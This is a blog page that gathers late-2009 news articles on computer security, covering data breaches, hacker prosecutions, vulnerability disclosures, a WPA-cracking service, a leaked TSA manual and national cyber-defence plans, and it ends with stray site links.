Even if the adware slingers come through on this offer to pay via PayPal, the amount of the bribe is probably a problem. "In places where a dollar is worth enough to make this worth the effort, there probably isn’t any internet connectivity," writes Sunbelt security researcher Tom Kelchner.

Sunbelt's blog contains a screenshot illustrating C4DLMedia's terms and conditions here.

Even though $1 barely stretches to a pint of milk these days, the price on offer from C4DLMedia (taken at face value) appears high. Pay-per-install malware affiliates typically earn far, far less. Recent research found that malware affiliates might earn only $140 per 1,000 US-based machines they infect, between $30-$110 for Western European infections and just $6 per 1,000 infected computers located in Asia.

TJX Hacker to Plead Guilty to Heartland Breach

By Kim Zetter
Threat Level
Wired.com
December 8, 2009

Admitted TJX intruder Albert Gonzalez has entered into a plea agreement
on charges that he hacked into Heartland Payment Systems, Hannaford
Brothers, 7-Eleven and two other unnamed national retailers.

The revelation comes in a filing made by Gonzalez's attorney in U.S.
District Court in New Jersey, where the Heartland charges were filed in
August.

A federal judge on Tuesday officially transferred the New Jersey case to
Massachusetts, where Gonzalez is seeking to merge it with two other
cases in which he’s already pleaded guilty.

Gonzalez, a former Secret Service informant known by the online nicks
"segvec" and "Cumbajohnny," was charged in New Jersey in August, along
with two unnamed Russian hackers. They were accused of stealing more
than 130 million debit and credit cards from card-processing company
Heartland and the other target companies.

Gonzalez and 10 others were also charged in May 2008 in New York and in
August 2008 in Massachusetts with network intrusions into TJX,
OfficeMax, Dave & Busters restaurant chain and other companies. Gonzalez
pleaded guilty to these charges in August and was scheduled to be
sentenced in Massachusetts on Dec. 21 in both cases.

Hacker Exposes Unfixed Security Flaws In Pentagon Website

By Kelly Jackson Higgins
DarkReading
Dec 08, 2009

A Romanian hacker has posted a proof-of-concept attack exploiting
vulnerabilities on the Pentagon's public Website that were first exposed
several months ago and remain unfixed.

The hacker, who goes by Ne0h, demonstrated input validation errors in
the site's Web application that allow an attacker to wage a cross-site
scripting (XSS) attack. The XSS vulnerability had been previously
disclosed by at least two other researchers several months ago -- and
Ne0h's findings show the bug is still on the site.

The site, which is run by the Office of the Assistant Secretary of
Defense for Public Affairs, is basically a tourist site for the Pentagon
and doesn't appear to house any sensitive data. But a security
researcher who studied the Ne0h's work says the Pentagon Website could
be used to redirect users to a malicious site posing as the Pentagon
site.

Daniel Kennedy, partner with Praetorian Security Group, says the session
ID appears to be a tracking cookie, and JavaScript can be injected into
the page itself to redirect a user to another site, for instance. "Since
I can pass that page a reference to an external JavaScript, I can do
most anything I can do in JavaScript," says Kennedy, who blogged about
the find yesterday. "That includes basic stuff, like crafting a URL to
send to users that appears to be from the Pentagon, but actually
redirects to 'evil.org,'" for example, he says.

Microsoft plugs zero-day IE hole

By Elinor Mills
InSecurity Complex
CNet News
December 8, 2009

Microsoft released fixes on Tuesday for a critical vulnerabilities in
Internet Explorer, including one for which exploit code has been
released.

Adobe, meanwhile, was scheduled to release a critical update affecting
Flash Player and Adobe AIR, following news of exploit code being
released for a vulnerability in Illustrator CS3 and CS4 on Windows and
Mac last week.

Microsoft's regular Patch Tuesday release includes six security
bulletins addressing 12 vulnerabilities in IE, Windows, Windows Server,
and Office.

However, priority should be given to the cumulative IE bulletin, which
affects all major Windows versions including Windows 7, IE 6, IE 7, and
IE 8. The bulletin fixes five holes that could allow an attacker to
remotely take control over a system in drive-by download attacks. The
fix also addresses a problem with ActiveX control built with Microsoft
Active Template Library (ATL) headers that could allow remote code
execution.

"Vulnerabilities in IE are generally pretty serious because all you have
to do is go to a Web page or get referred to one" that has malicious
code on it, said Jason Avery, manager of the Digital Vaccine service at
Tipping Point. Three of the IE holes were disclosed through Tipping
Point's Zero Day Initiative program over the summer, he said.

Hacker charges $43, 000 in calls to Buffalo Grove firm's phone

By KATHY ROUTLIFFE
Pioneerlocal.com
December 8, 2009

"Reach out and trick someone" could be the slogan of a hacker who
charged $43,000 in telephone calls -- mostly to Cuba -- to a Buffalo
Grove worker's company phone within a period of days.

Police reported that an employee at RMS Technologies, 1359 N. Barclay
Blvd., became aware someone had hacked into the phone system to make
free calls after his phone service carrier warned of the unusual
activity between Oct. 9 and 12.

"As far as how the technology works to rack up that many calls, we don't
know,” police Cmdr. Steven Husak said Monday. "(The employee's) phone
carrier alerted him to the situation, and he thought he had resolved it
until he received the bill."

Tuesday, 8 December 2009

White House security 'breached 91 times since 1980

By Giles Whittell in Washington
The Times
December 8, 2009

If the would-be celebrities who crashed a White House state dinner knew
what the Secret Service knew they might not even have bothered to dress
up.

According to a devastating internal review leaked after Tareq and
Michaele Salahi strolled into the banquet for the Indian Prime Minister
without a ticket, there have been at least 91 breaches of Secret Service
security in the past 30 years, including at least four by a serial
intruder who believes that God has made him undetectable to bodyguards.

It turns out that the men who talk into their cuffs are only human. A
family of four once penetrated the White House security cordon simply by
honking on the horn of their minivan. Five years later an intruder
nicknamed the Paper Boy drove through an open White House gate
unchallenged and gave a Secret Service agent a pair of handcuffs before
he was himself arrested.

In 2003 a stowaway flew several thousand miles across Africa aboard Air
Force One without credentials, claiming when apprehended that he had
brought weapons on to the presidential jet, and four times between 1991
and 2003 the Rev Richard "Rich" Weaver shook hands with presidents he
was not cleared to meet. On at least two of those occasions Mr Weaver
managed to give the Commander in Chief a souvenir of his supposedly
divine mission.

[...]

HSBC exposed sensitive bankruptcy data

By Robert McMillan
IDG News Service
December 4, 2009

HSBC Bank says a bug in its imaging software inadvertently exposed
sensitive data about some of its customers going through bankruptcy
proceedings.

In notification letters made public Thursday, the bank said it had
redacted sensitive information in Chapter 13 bankruptcy proof-of-claim
forms that were filed electronically, but that the information turned
out to be viewable "as a result of the deficiency in the software used
to save imaged documents."

An HSBC spokeswoman declined to elaborate on the cause of the problem,
but said "a limited number of customers" were affected. HSBC has "no
reason to believe customers' personal information may have been
compromised," she added via e-mail. The company sent letters to affected
customers in October and is offering them one year of free credit
monitoring.

Some customers of the following HSBC companies are affected: HSBC
Taxpayer Financial Services, Beneficial New Hampshire and Household
Finance Corporation.

[...]

PayPal mistakes own email for phishing attack

By John Leyden
The Regiser
4th December 2009

Banks and financial institutions are fond of lecturing customers about
the perils of phishing emails, the bogus messages that attempt to trick
marks into handing over their login credentials to fraudulent sites. Yet
many undo this good work by sending out emails themselves that invite
users to click on a link and log into their account rather than going a
safer route and telling users to use bookmarked versions of their site.

The problems of the former approach are neatly illustrated by a blog
posting by Randy Abrams, a former Microsoft staffer who is now director
of technical education at anti-virus firm Eset. Abrams complained about
the inclusion of a link in an email from PayPal as it looked rather too
much like a phishing email.

PayPal support staffers responded not by noting that Abrams may have a
point, which it would consider, but by treating its own email - which it
acknowledged was "suspicious-looking" - as a phishing attack.

"Not even PayPal support can tell the difference between a legitimate
PayPal email and a phishing attack," Abrams notes.

[...]

New cloud-based service steals Wi-Fi passwords

By Robert McMillan
IDG News Service
December 7, 2009

For $34, a new cloud-based hacking service can crack a WPA (Wi-Fi
Protected Access) network password in just 20 minutes, its creator says.

Launched today, the WPA Cracker service bills itself as a useful tool
for security auditors and penetration testers who want to know if they
could break into certain types of WPA networks. It works because of a
known vulnerability in Pre-shared Key (PSK) networks, which are used by
some home and small-business users.

To use the service, the tester submits a small "handshake" file that
contains an initial back-and-forth communication between the WPA router
and a PC. Based on that information, WPA Cracker can tell whether the
network seems vulnerable to this type of attack.

The service was launched by a well-known security researcher who goes by
the name of Moxie Marlinspike. In an interview, he said that he got the
idea for WPA Cracker after talking to other security experts about how
to speed up WPA network auditing. "It's kind of a drag if it takes five
days or two weeks to get your results," he said.

TSA Leaks Sensitive Airport Screening Manual

By Kim Zetter
Threat Level
Wired.com
December 7, 2009

Who needs anonymous sources when the government is perfectly capable of
leaking its own secrets?

Government workers preparing the release of a Transportation Security
Administration manual that details airport screening procedures badly
bungled their redaction of the .pdf file. Result: The full text of a
document considered "sensitive security information" was inadvertently
leaked.

Anyone who's interested can read about which passengers are more likely
to be targeted for secondary screening, who is exempt from screening,
TSA procedures for screening foreign dignitaries and CIA-escorted
passengers, and extensive instructions for calibrating Siemens
walk-through metal detectors.

The 93-page document also includes sample images of DHS, CIA (see above)
and congressional identification cards, with instructions on what to
look for to verify an authentic pass.

The manual, titled Screening Management Standard Operating Procedure, is
dated May 28, 2008. It contains this warning: "NO PART OF THIS RECORD
MAY BE DISCLOSED TO PERSONS WITHOUT A 'NEED TO KNOW.'"

Notwithstanding that disclaimer, the document appeared on FedBizOpps, a
government clearinghouse that lists federal contracting opportunities
for vendors. It has since been removed from the site, but not before
someone grabbed it and submitted it to the whistleblower site Cryptome,
where the formerly-redacted portions are highlighted in red boxes. The
discovery was first made by a blogger at Wandering Aramean.

[...]

Friday, 4 December 2009

Engineers who hacked into L.A. traffic signal computer, jamming streets, sentenced

By Shelby Grad
Los Angeles Times
December 1, 2009

Two L.A. traffic engineers who pleaded guilty to hacking into the city's signal system and slowing traffic at key intersections as part of a labor protest have been sentenced to two years' probation.

Authorities said that Gabriel Murillo, 40, and Kartik Patel, 37, hacked into the system in 2006 despite the city's efforts to block access during a labor action.

Fearful that the strikers could wreak havoc, the city temporarily blocked all engineers from access to the computer that controls traffic signals.

But authorities said Patel and Murillo found a way in and picked their targets with care -- intersections they knew would cause significant backups because they were close to freeways and major destinations.

Crooks 'too lazy' for crypto

By Chris Williams
The Register
3rd December 2009

The widespread use of encryption by criminals - long feared by intelligence and law enforcement agencies - has yet to materialise, according to the man in charge of the country's largest digital forensics unit.

Mark Stokes, head of the Metropolitan Police's Digital and Electronic Forensic Services (DEFS), told The Register that "literally a handful"
of the tens of thousands of devices it handles each year from across the whole of London involve encrypted data.

"We're still to this day not seeing widespread use of encryption," he said.

Despite the availability of scrambling products such as PGP, TrueCrypt and Microsoft's BitLocker, criminals are not making life difficult for forensic investigators to access their files.

"You'd think paedophiles would use it, but they don't. It's just human nature to think they'll never get caught," said Stokes, an electronics

Cisco, Juniper vulnerable to hacking

By Reuters
3 Dec 2009

The US government has identified flaws in equipment from four companies, including Cisco Systems, that hackers can exploit to break into corporate computer networks.

The Department of Homeland Security's US Computer Emergency Readiness Team, US-CERT, said on its Web site that the warning applies to certain networking products from Cisco, Juniper Networks, SonicWall and SafeNet.

The flaw applies to equipment with technology known as SSL VPN that companies use to set up secure communications systems for safely accessing internal computer systems over the Internet.

It affects VPN systems run directly through a Web browser, rather than through software installed on a user's PC, which is more widely used.

Hackers who exploit the vulnerability could gain broad access to corporate networks, then steal confidential data, install malicious software or turn PCs into spam servers.

A Call to Cyber Arms

By Maryann Lawlor
SIGNAL Scape
The official blog of
AFCEA International
and SIGNAL Magazine
12/02/09

Sherri Ramsay, director of the NSA's Central Security Service Threat Operations Center, opened AFCEA's SOLUTIONS Series today by admitting that the intersection of cyber, national and economic security has changed the way her organization interacts with industry. Citing statistics that cybercrime has cost individuals more than $2 billion, Ramsay called for shared network situational awareness across the U.S.
government, industry and individuals. This holistic approach must include information about who owns, operates and defends the networks, she said.

"Cyberspace at the Cross Roads: The Intersection of Cyber, National and Economic Security," is the third in this year's SOLUTIONS series of forums and is taking place December 2-3 at the National Conference Center. The event features presentations by military and government leaders as well as three tracks of panel sessions that are designed to prompt discussions among attendees.

Despite the need for a holistic approach to cybersecurity, Ramsay acknowledged that determining how to do it poses many challenges. She related that while discussing cyber defense with her counterparts in New Zealand, she described the change in tactics as the difference between playing football and playing soccer. While the former involves offensive and defensive teams taking the field separately, the latter calls on offensive players to go on the defense as soon as possession of the ball changes sides. The New Zealanders agreed that a change has taken place but said that cyber defense today more resembles rugby.

Ramsay called on government, industry and individuals to be more proactive in their part of cybersecurity. To this end, the NSA now uses the term "Team Cyber" every day to describe how it is enacting cyber defenses. Members of the team include the government, industry and academia to such an extent that the NSA has actually brought antivirus vendors into the same room with government network defenders to observe networks under attack. The vendors were then given the information and signatures they would need to improve the next version of their products.

Cyber Warfare Command to Be Launched in January

By Jung Sung-ki
Staff Reporter
The Korea Times
12-01-2009

The Ministry of National Defense will launch a cyber warfare command next month, officials said Tuesday.

The command will conduct both defensive and offensive cyber operations under the direction of the defense minister, they said.

Previously, the ministry had been considering establishing a cyber command under the control of the Defense Security Command (DSC), whose mission is to defend military networks against computer attacks.

The command will be led by a major general and have 200 specialists, the officials said.

Earlier this year, the DSC said the country's military computer networks faced about 95,000 reported hacking attacks per day on average.

In July, the government and industrial computer networks suffered from massive distributed denial of service (DDoS) attacks for several days.

Some intelligence sources from South Korea and the United States blamed North Korea for the attacks, though no solid evidence has been found to support those claims.

North Korea is known to operate a cyber warfare unit that specializes in hacking into South Korean and U.S. military networks to extract classified information.

Metasploit Gets New Vulnerabilty Scanning Features

By Kelly Jackson Higgins
DarkReading
Dec 01, 2009

A new version Metasploit released today includes integrated vulnerability scanning for the popular open source penetration testing tool.

Rapid7, which recently purchased Metasploit, today announced both the new version of Metasploit, 3.3.1, as well as a new free version of Rapid7's NeXpose vulnerability scanner. The NeXpose Community Edition is basically a slimmed-down version of the company's enterprise-class scanner that's limited in the number of IP's it can scan.

The free NeXpose version is integrated with Metasploit 3.3.1 with a plug-in to the Metasploit console. "This integration is the first to actually run the [vulnerability] scan and do the import of the data for you," says HD Moore, chief security officer for Rapid7 and creator of Metasploit. It lets the penetration tester run the scan, import the data, and automatically run exploits against the vulnerabilities, he says.

"This is the first step in the integration" of Metasploit and the NeXpose vulnerability scanning platform, Moore says. The tools work together from the Metasploit console with a command-line plug-in: the penetration tester loads Metasploit, connects to NeXpose, and runs the scan from there. The scan data is then brought in to Metasploit and cross-referenced with Metasploit's modules, which then are automatically launched to test out the vulnerabilities, he says. "The whole process is from the Metasploit console," he says.

Wanted: A Smokey Bear for cybersecurity

By Amber Corrin
FCW.com
Dec 02, 2009

Cybersecurity has become more than a homeland security issue; it has become a national lifestyle issue that hinges on raising education at the individual level, a panel of information security experts said today.

"If the U.S. is going to continue to be a center of innovation in the world, we need to up our game. and get on par with the science, engineering and technology schooling of China and India, according to Richard Schaffer, information assurance director at the National Security Agency.

"It's a U.S. problem; it.s a challenge that, [if left] unmet, is going to put us in a dangerous situation in 10 or 20 years when we can't afford to be in second place. We never want to be in second place,"
Schaffer added.

Beyond formal education, U.S. cybersecurity strategy needs to develop a public awareness campaign that permeates the workplace, schools and homes -- much like the development of Smokey Bear in the 1970s to promote fire safety, panelists said.

"This [campaign] needs to include secretaries, administrators, front-line people who have no idea [about technology and cyberspace] - not just front line cyber operators," said Adam Meyers, an SRA International information assurance principal who currently works with the State Department.

The Fruit of the Poisoned Tree

By M. E. Kabay
Network World
12/02/2009

Should we hire criminal hackers as security experts? This is the second of a two-part attack on the idea from a 1995 debate in which I participated.

* * *

On a broader scale, consider the message you would be giving some thirteen year old proto-hacker. These kids, like most kids, are tremendously susceptible to peer pressure. They already find criminal hacking attractive because it's viewed as today's counter-culture -- something fairly harmless (compared with, say, dealing drugs) but exciting because it's illegal. Now imagine that the older creeps can announce that they've just been hired by The Man (i.e., authority
figures) to work in counter-intelligence, snooping in foreign companies'
files for money (you don't imagine they'd keep it quiet, do you?) -- Oh man -- not only is criminal hacking glittering with the allure of the forbidden now, but you can hope to earn money with it from the government!

The children and emotionally-arrested adolescents involved in criminal hacking already have a love/hate attitude towards The Man. Many of them claim that they'd like to work for security firms when (if) they grow up. This myth that criminal hacking is a reasonable basis for work in security would become even more pernicious if it were known that more hackers had in fact been solicited and used by government or corporate organizations. Using such people would reinforce the attractiveness of criminality.

Consider the outcry if the military in a democracy actively solicited murderers to be soldiers. The great challenge of military training is to temper savagery with honor; to provide a moral framework within which war is viewed as undesirable, killing as regrettable. A soldier who lies is a stain on his unit's honor. A soldier who steals is a wretch who deserves expulsion. And a soldier who breaks his word is a traitor to his country. And so how shall we deal with people whose entire way of life is to lie and to steal and to cheat?

Tuesday, 1 December 2009

Priyanka's twitter update could be security threat

[Ankit Fadia, India's uber hacking expert, appears to heavily promote Viagra, or been hacked by evil spammers that found a way to subtlety deface the web page. - http://attrition.org/errata/sec-co/fadia01.html - WK]


By Kumar Saurav
Mid Day
2009-11-23
Mumbai

Not just Priyanka Chopra, but any celebrity or public figure's Twitter updates can jeopardize national security, claims 24 year-old ethical hacker Ankit Fadia

Mumbai-based cyber security consultant Ankit Fadia, who claims that his website Hacking Truths was judged as the second best hacking site in the world by the FBI, says social networking sites are the latest threat to India's security. The potency and penetration of social networking in the country has made it possible for anyone to track and connect with film stars, politicians and other public figures who were once beyond reach.

Karan Johar, Priyanka Chopra, Aishwarya Rai, Shashi Tharoor and Barack Obama are just a few from a whole bunch of celebrities who update their Twitter status regularly. But "are they doing it wisely?" is what Fadia asks.


Why are you apprehensive about celeb tweeting?

If you follow celebs, you'll observe that they disclose information on where they are shooting, what their shooting schedule looks like and the hotel they are put up at. Unintentionally, they are inviting trouble, because troublemakers are hungry for such information.


Any instances?

Singer Britney Spears' account on Twitter is hacked almost once every two months. One of the hackers even claimed on her wall, that he's her public relation officer and that Britney is dead, with details about the date and venue of her funeral.

Indian politico Shashi Tharoor's account has been hacked several times too. Even Big B and Aamir Khan's blog were hacked. Once a blog, website, social networking account is hacked, a hacker has full control over it.
He can spread rumours, communicate with fellow criminals, and indirectly make you a partner in their crime.


How would you rate the technical stylishness of terrorists?

They are far ahead. When I was asked by the US intelligence to decode some scripts after the 9/11 attacks, I was stunned to see the kind of technology they used to communicate. The agencies had tracked some emails where a few individuals were frequently exchanging photographs of Canadian rockstar Avril Lavigne. Hidden text messages that aren't visible to the naked eye, were being exchanged through these pictures.


What about Mumbai's 26/11 terror attacks?

For 26/11, they had used highly secured Voice Over Internet Protocol
(VOIP) like Skype to communicate with each other. The data on VOIPs'
servers is so huge that by the time you track them, the damage has been done and criminals are out of reach. The 26/11 terrorists had used the "proxy bouncing" technique, where in they were sending messages through a Saudi Arabia based server, while they were actually sitting in Pakistan.


Why is tracking such messages so difficult?

They know the loopholes, and how to use them affectively. Suppose three terrorists A, B and C want to communicate with each other, what they do is create a Twitter account and follow each other, thus forming a closed group. So if A posts a message saying "Plant Bomb at Parliament at 11 am", just B and C will be able to see the message. And since Twitter is based in the US, Indian authorities wouldn't have control over this exchange of messages.

Tracking messages is another problem. I will track a suspicious mail only if it's sent. If A wants to communicate with B, he will type an email and save it as a draft instead of sending it. Now B, whose has A's password will log in to A's account, read the mail in the "Draft"
folder. Since the mail hasn't been sent, it becomes almost impossible to track it.


How do spammers and hackers operate in social networking sphere?

There are viruses, worms, spyware and malware that spread through social networking websites. One day, you receive a private message from one of your friends (who is already infected) containing a link to a Youtube video. Halfway through the video, it will prompt you to download some video plugin. Since the message comes from your friend, you trust it, but the moment you click it, you get infected. Get rich quick schemes, earn money online scams and various money laundering attacks now come through social networking sites.

Cyber crime danger

THE Police Force has forecast cyber crimes to increase by 40 to 50 per cent from 2010 to 2012.

Jemesa Lave of the police cyber crime unit said in these two years, it was anticipated that more complicated technological crimes would be perpetrated in Fiji.

Coupled with this, he said was the anticipated shift from conventional criminal operations to cybercrime.

"We need legislation, we need to ensure that standards are put in place to address computer crime issues," Mr Lave said.

He said people needed to be aware that computer crimes knew no borders.

Mr Lave said the major challenge for Fiji was having implemented legislations to cover this.

He said at present, the police had some degree of capability to detect and investigate recently enacted decrees to ensure offenders were brought to decide.

At the cyber crime unit, there are 13 INTERPOL trainers in IT crime investigation, two certified computer forensics specialist, computer forensics specialists, one certified application forensics speciality, and one certified mobile forensics specialist.

Mr Lave said 70 per cent of the reports they received had been investigated by CID headquarters.

The nation needs a clear cyber war doctrine

By William Jackson
GCN.com
Nov 30, 2009

A recent study from McAfee on cyber crime and cyber warfare concluded that, like it or not, the world.s information infrastructures are becoming theaters of war, as nations develop offensive and defensive capabilities to wage cyber warfare.

"Cyber weapons exist, and we should expect that adversaries might use them," said James Lewis, director of the Technology and Public Policy program at the Center for Strategic and International studies. Lewis is one of 2,000 national and cybersecurity experts who were interviewed for the study.

The threat of cyber war is not comforting, but more disturbing is the fact that we do not know how to use the weapons we are developing. Our ability to defend ourselves and to take the struggle to our enemies is hindered by the difficulty in understanding the sources and motives behind what might be considered hostile action against our networks and systems. Unlike attacks by conventional and nuclear military weapons, cyber attacks tend to be asymmetrical, remote and hidden. It is difficult to tell who is behind an attack and what its objective is.

It is easy to blame North Korea or China for intrusions that seem to be launched from computers in those countries, but the location of a computer or network launching an attack says little about who is behind it.

CERT Australia pushes on network security

By Karen Dearne
The Australian
December 01, 2009

The new computer emergency response team, CERT Australia, will expect internet service providers to be more active in cleaning up infected computers operating on their networks.

Following the federal government's e-security review last year, the Internet Industry Association has been hammering out a voluntary ISP code of practice aimed at identifying botnet activity and alerting customers to security breaches.

Attorney-General's Department national security resiliency division head Mike Rothery said CERT Australia would be a two-way clearing house for notifications from local and international authorities, with responsibility for tracking down compromised machines in Australian domains.

"We'll be establishing relationships with our CERT counterparts so that if we identify (attacks coming from) compromised machines overseas, we can ask those authorities to trace the actual owners and seek that those be cleaned up," Mr Rothery said.

"Where identified machines appear to be in Australia -- and the notification may come from overseas or from a local ISP or web hosting company -- we will track down the owners through their ISP or web host and tell them their machines have been compromised.

I Was Wrong: There Probably Will Be an Electronic Pearl Harbor

By Ira Winkler
CSO
November 29, 2009

For 15 years now, I have been publicly lambasting all of those people who have made their careers, or at least made fleeting news headlines, based on their declaration of an imminent Electronic Pearl Harbor. My disdain is based on several factors, but predominantly the lack of accountability for such statements. One industry analyst, for example, stated that there will be such an event by the end of 2003. Six years later, I didn't see anyone revisit the utter lack of such an event.

However, I now see things developing to the point where there can be a strategic attack on computer infrastructures. The key word is Strategic.

Another major issue I have with the people who stake their fame in information warfare is the lack of apparent understanding in the concept of military and geopolitical issues. Specifically, strategy implies long term impacts, generally at least 3-6 months. Tactical attacks have short term impacts. Yes, we have had many tactical attacks against different infrastructures. However, comparing these attacks to Pearl Harbor is insulting.

Pearl Harbor was a preemptive strike against the US Pacific Fleet. It significantly degraded the US Naval capability for several years. If the aircraft carriers were in Pearl Harbor as the Japanese expected, it could have been a complete knockout blow. So the question becomes, what can make a computer attack strategic?

[...]

Gilbert man loses job in case tied to alien-search software

By Emily Gersema
The Arizona Republic
Nov. 30, 2009

The search for intelligent life apparently has stopped for Brad Niesluchowski.

Higley Unified School District records obtained by The Arizona Republic show that Niesluchowski, of Gilbert, resigned in October after an investigation into suspicious activity, including the use of a program that searches satellite signals for extraterrestrial life.

According to the documents, district officials said they found Niesluchowski had abused his authority in purchasing and oversight of district technology and equipment, and downloaded to every district computer a University of California-Berkeley program that relies on volunteers and their personal computers to search satellite-collected data for signs of intelligent life in outer space.

Higley officials so far estimate the damages, energy usage and equipment losses linked to Niesluchowski at $1.2 million to $1.6 million.

District administrators hand-delivered a notice of termination of contract for cause to Niesluchowski on Oct. 7, which he refused to sign.
He instead consulted an attorney, and then resigned at the attorney's advice.

According to the termination letter, Niesluchowski faces several allegations that he violated the terms and responsibilities of his contract and ethics policies - and is the focus of a criminal investigation. Documents show:

* During a warranted search of his home earlier this fall, Gilbert
police found 18 computers and other equipment stolen from the
district.

* District officials said they learned Niesluchowski never installed
firewalls that would protect students' and staff members' personal
information from hackers, exposing district computer and data to
potential tampering or damage.

* District officials also say he failed to train and supervise other
tech staff.

* Officials allege he downloaded to every district computer a University
of California-Berkeley program known as "SETI@home." SETI is short for
the "Search for Extra Terrestrial Intelligence."

Restaurants Sue Vendor for Unsecured Card Processor

By Kim Zetter
Threat Level
Wired.com
November 30, 2009

Seven restaurants have sued the maker of a bank card-processing system for failing to secure the product from a Romanian hacker who breached their systems.

The restaurants, located in Louisiana and Mississippi, have filed a class-action suit against Georgia-based Radiant Systems for producing a point-of-sale (POS) system that they say was not compliant with payment card industry security standards and resulted in an undetermined number of customers having their debit and credit card numbers stolen.

The suit alleges that the system stored all of the data embedded on the bank card magnetic stripe after the transaction was completed -- a violation of industry security standards that made the systems a high-risk target for hackers.

Also named in the suit is Computer World, a Louisiana-based retailer, which sold and maintained Radiant's Aloha POS system.

According to plaintiffs, Computer World's technicians allegedly installed the remote-access program PCAnywhere on the systems to allow its technicians to fix technical problems from off-site. The only problem is, the company failed to secure the program. The suit alleges that the system was not up to date with software patches, and the PCAnywhere remote log-in and password that technicians used to access the POS systems was the same at every one of the 200 Louisiana locations where the system was installed. According to one of the plaintiffs who spoke with Threat Level, the default login was "administrator" and the password was "computer."

emails

a

The Register - Security

IQ test

The Register - Security: Anti-Virus

HackWire - Hacker News